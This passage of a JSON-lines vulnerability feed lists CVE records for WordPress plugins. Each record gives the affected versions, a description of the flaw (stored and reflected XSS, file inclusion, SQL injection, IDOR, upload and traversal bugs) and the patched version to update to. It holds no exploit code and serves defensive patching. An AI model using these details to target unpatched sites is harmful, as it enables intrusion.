version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-switcha\\\/tags\\\/3.3\\\/inc\\\/plugin-core.php#L445\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theme-switcha\\\/tags\\\/3.3\\\/inc\\\/plugin-core.php#L445\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b0937fe-3ea6-427a-aef7-539c08687abb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b0937fe-3ea6-427a-aef7-539c08687abb?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2979783\\\/theme-switcha#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2979783\\\/theme-switcha#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3565","slug":"custom-post-widget","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"The Content Blocks (Custom Post Widget) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'content_block' shortcode in all versions up to, and including, 3.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16d8eab2-953a-46bf-a0f6-296bcea86305?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16d8eab2-953a-46bf-a0f6-296bcea86305?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-widget\\\/trunk\\\/shortcode.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-post-widget\\\/trunk\\\/shortcode.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078739%40custom-post-widget&new=3078739%40custom-post-widget&sfp_email=&sfph_mail=#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078739%40custom-post-widget&new=3078739%40custom-post-widget&sfp_email=&sfph_mail=#file6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3564","slug":"custom-post-widget","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"The Content Blocks (Custom Post Widget) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.0 via the plugin's 'content_block' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a0b8fe-d284-4780-84b5-2e97fa96c99a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a0b8fe-d284-4780-84b5-2e97fa96c99a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078739%40custom-post-widget&new=3078739%40custom-post-widget&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3078739%40custom-post-widget&new=3078739%40custom-post-widget&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0252","slug":"contextual-related-posts","versionEndExcluding":"3.3.1","description":"The Contextual Related Posts WordPress plugin before 3.3.1 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5754a4fd-1adf-47aa-976f-3b28750058c2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5754a4fd-1adf-47aa-976f-3b28750058c2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-29142","slug":"better-search","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebberZone Better Search \u2013 Relevant search results for WordPress allows Stored XSS.This issue affects Better Search \u2013 Relevant search results for WordPress: from n\/a through 3.3.0.\n\n","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/better-search\\\/wordpress-better-search-plugin-3-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/better-search\\\/wordpress-better-search-plugin-3-3-0-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13552","slug":"supportcandy","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"The SupportCandy \u2013 Helpdesk & Customer Support Ticket System plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.0 via file upload due to missing validation on a user controlled key. This makes it possible for authenticated attackers to download attachments for support tickets that don't belong to them. If an admin enables tickets for guests, this can be exploited by unauthenticated attackers.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supportcandy\\\/trunk\\\/includes\\\/admin\\\/tickets\\\/class-wpsc-new-ticket.php#L395\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supportcandy\\\/trunk\\\/includes\\\/admin\\\/tickets\\\/class-wpsc-new-ticket.php#L395\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235142\\\/supportcandy\\\/trunk?old=3188306&old_path=%2Fsupportcandy%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235142\\\/supportcandy\\\/trunk?old=3188306&old_path=%2Fsupportcandy%2Ftrunk\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13f87248-cc0b-4351-b79d-6efc5190b021?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13f87248-cc0b-4351-b79d-6efc5190b021?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2013-10028","slug":"eelv-newsletter","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"A vulnerability was found in EELV Newsletter Plugin 2.x on WordPress. It has been rated as problematic. Affected by this issue is the function style_newsletter of the file lettreinfo.php. The manipulation of the argument email leads to cross site scripting. The attack may be launched remotely. The name of the patch is 3339b42316c5edf73e56eb209b6a3bb3e868d6ed. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230660.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/eelv-newsletter\\\/commit\\\/3339b42316c5edf73e56eb209b6a3bb3e868d6ed\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/eelv-newsletter\\\/commit\\\/3339b42316c5edf73e56eb209b6a3bb3e868d6ed\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230660\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230660\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230660\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230660\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9860","slug":"bridge-core","versionImpact":"3.3","versionEndExcluding":"3.3.1","description":"The Bridge Core plugin for WordPress is vulnerable to unauthorized modification of data or loss of data due to a missing capability check on the 'import_action' and 'install_plugin_per_demo' functions in versions up to, and including, 3.3. This makes it possible for authenticated attackers with subscriber-level permissions or above, to delete or change plugin settings, import demo data, and install limited plugins.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/968d5d31-2592-4bed-9d18-5877f0d6062e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/968d5d31-2592-4bed-9d18-5877f0d6062e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/bridge-creative-multipurpose-wordpress-theme\\\/7315054\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/bridge-creative-multipurpose-wordpress-theme\\\/7315054\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5050","slug":"leaflet-map","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"The Leaflet Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3084c9ab-00aa-4b8e-aa46-bd70b335ec77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3084c9ab-00aa-4b8e-aa46-bd70b335ec77?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leaflet-map\\\/tags\\\/3.3.0\\\/shortcodes\\\/class.geojson-shortcode.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leaflet-map\\\/tags\\\/3.3.0\\\/shortcodes\\\/class.geojson-shortcode.php#L124\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968965\\\/leaflet-map#file12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2968965\\\/leaflet-map#file12\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13900","slug":"header-footer","versionImpact":"3.3.0","versionEndExcluding":"3.3.1","description":"The Head, Footer and Post Injections plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 3.3.0. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject PHP Code in multisite environments.","recommendation":"Update to version 3.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244016\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244016\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5177bde6-4922-48ee-9155-577c392809a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5177bde6-4922-48ee-9155-577c392809a0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1785","slug":"download-manager","versionImpact":"3.3.08","versionEndExcluding":"3.3.09","description":"The Download Manager plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3.08 via the 'wpdm_newfile' action. This makes it possible for authenticated attackers, with Author-level access and above, to overwrite select file types outside of the originally intended directory, which may cause a denial of service.","recommendation":"Update to version 3.3.09, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3252990%40download-manager&new=3252990%40download-manager&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3252990%40download-manager&new=3252990%40download-manager&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc5c7974-4c10-4880-8823-2accee3c0da4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc5c7974-4c10-4880-8823-2accee3c0da4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13126","slug":"download-manager","versionImpact":"3.3.06","versionEndExcluding":"3.3.07","description":"The Download Manager WordPress plugin before 3.3.07 doesn't prevent directory listing on web servers that don't use htaccess, allowing unauthorized access of files.","recommendation":"Update to version 3.3.07, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2c69a44-4ecc-41d1-a10c-cfe9c875b803\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c2c69a44-4ecc-41d1-a10c-cfe9c875b803\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11768","slug":"download-manager","versionImpact":"3.3.03","versionEndExcluding":"3.3.04","description":"The Download Manager plugin for WordPress is vulnerable to unauthorized download of password-protected content due to improper password validation on the checkFilePassword function in all versions up to, and including, 3.3.03. This makes it possible for unauthenticated attackers to download password-protected files.","recommendation":"Update to version 3.3.04, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/__\\\/Apply.php#L376\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/__\\\/Apply.php#L376\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb915f4-66d6-4f46-949c-5354e414319b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb915f4-66d6-4f46-949c-5354e414319b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11740","slug":"download-manager","versionImpact":"3.3.03","versionEndExcluding":"3.3.04","description":"The The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 3.3.04, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.02\\\/src\\\/Package\\\/Hooks.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.02\\\/src\\\/Package\\\/Hooks.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.02\\\/src\\\/Package\\\/views\\\/shortcode-iframe.php#L203\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/tags\\\/3.3.02\\\/src\\\/Package\\\/views\\\/shortcode-iframe.php#L203\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a7be578-5883-4cd3-963d-bf81c3af2003?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a7be578-5883-4cd3-963d-bf81c3af2003?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10706","slug":"download-manager","versionImpact":"3.3.02","versionEndExcluding":"3.3.03","description":"The Download Manager WordPress plugin before 3.3.03 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.3.03, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01193420-9a4c-4961-93b6-aa2e37e36be1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01193420-9a4c-4961-93b6-aa2e37e36be1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8444","slug":"download-manager","versionImpact":"3.2.99","versionEndExcluding":"3.3.00","description":"The Download Manager WordPress plugin before 3.3.00 doesn't sanitize some of it's shortcode parameters, leading to cross site scripting.","recommendation":"Update to version 3.3.00, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf2f5aa8-a161-43ff-a6ee-8603aaba8012\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf2f5aa8-a161-43ff-a6ee-8603aaba8012\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3751","slug":"seriously-simple-podcasting","versionImpact":"3.2.0","versionEndExcluding":"3.3.0","description":"The Seriously Simple Podcasting WordPress plugin before 3.3.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c684b05-2545-4fa5-ba9e-91d8b8f725ac\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c684b05-2545-4fa5-ba9e-91d8b8f725ac\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4869","slug":"gdpr-cookie-consent","versionImpact":"3.2.0","versionEndExcluding":"3.3.0","description":"The WP Cookie Consent ( for GDPR, CCPA & ePrivacy ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Client-IP\u2019 header in all versions up to, and including, 3.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/507b2e65-987b-4d4a-8a99-5366048d925e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/507b2e65-987b-4d4a-8a99-5366048d925e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdpr-cookie-consent\\\/tags\\\/3.2.0\\\/public\\\/class-gdpr-cookie-consent-public.php#L793\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdpr-cookie-consent\\\/tags\\\/3.2.0\\\/public\\\/class-gdpr-cookie-consent-public.php#L793\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdpr-cookie-consent\\\/tags\\\/3.2.0\\\/public\\\/modules\\\/consent-logs\\\/class-wpl-cookie-consent-consent-logs.php#L570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gdpr-cookie-consent\\\/tags\\\/3.2.0\\\/public\\\/modules\\\/consent-logs\\\/class-wpl-cookie-consent-consent-logs.php#L570\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11685","slug":"kudos-donations","versionImpact":"3.2.9","versionEndExcluding":"3.3.0","description":"The `Kudos Donations \u2013 Easy donations and payments with Mollie` plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of `add_query_arg` without appropriate escaping on the URL in all versions up to, and including, 3.2.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute if they can successfully trick a user into performing an action, such as clicking on a specially crafted link.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/Controller\\\/Table\\\/TransactionsTable.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FController%2FTable%2FTransactionsTable.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/Controller\\\/Table\\\/TransactionsTable.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FController%2FTable%2FTransactionsTable.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b02b5ea6-e112-4255-833c-87ee939986b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b02b5ea6-e112-4255-833c-87ee939986b0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11684","slug":"kudos-donations","versionImpact":"3.2.9","versionEndExcluding":"3.3.0","description":"The Kudos Donations \u2013 Easy donations and payments with Mollie plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 3.2.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/View\\\/kudos-admin-subscriptions.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FView%2Fkudos-admin-subscriptions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/View\\\/kudos-admin-subscriptions.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FView%2Fkudos-admin-subscriptions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/View\\\/kudos-admin-transactions.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FView%2Fkudos-admin-transactions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197315\\\/kudos-donations\\\/tags\\\/3.3.0\\\/app\\\/View\\\/kudos-admin-transactions.php?old=3178869&old_path=kudos-donations%2Ftags%2F3.2.9%2Fapp%2FView%2Fkudos-admin-transactions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f281c9a5-1663-4dca-968f-685d933f99b1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f281c9a5-1663-4dca-968f-685d933f99b1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9186","slug":"wp-marketing-automations","versionImpact":"3.2.2","versionEndExcluding":"3.3.0","description":"The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 does not sanitize and escape the bwfan-track-id  parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fab29b59-7e87-4289-88dd-ed5520260c26\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fab29b59-7e87-4289-88dd-ed5520260c26\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10091","slug":"elementskit-lite","versionImpact":"3.2.9","versionEndExcluding":"3.3.0","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Comparison Widget in all versions up to, and including, 3.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b278af-6ce6-4e70-a83a-a1b035542cd4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00b278af-6ce6-4e70-a83a-a1b035542cd4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.2.9\\\/widgets\\\/image-comparison\\\/image-comparison.php#L657\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.2.9\\\/widgets\\\/image-comparison\\\/image-comparison.php#L657\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0714","slug":"metform","versionImpact":"3.2.4","versionEndExcluding":"3.3.0","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Arbitrary File Upload due to insufficient file type validation in versions up to, and including, 3.2.4. This allows unauthenticated visitors to perform a \"double extension\" attack and upload files containing a malicious extension but ending with a benign extension, which may make remote code execution possible in some configurations.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/697ce433-f321-4977-a2ad-68369d9ce9c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/697ce433-f321-4977-a2ad-68369d9ce9c3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/file-data-validation.php?rev=2746287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/file-data-validation.php?rev=2746287\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2896914\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2896914\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3915","slug":"aeropage-sync-for-airtable","versionImpact":"3.2.0","versionEndExcluding":"3.3.0","description":"The Aeropage Sync for Airtable plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'aeropageDeletePost' function in all versions up to, and including, 3.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.","recommendation":"Update to version 3.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L475\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L475\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L476\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aeropage-sync-for-airtable\\\/trunk\\\/aeropage.php#L476\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281904\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3281904\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f98aab54-877b-47df-9c8a-5e70ea985c1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f98aab54-877b-47df-9c8a-5e70ea985c1c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
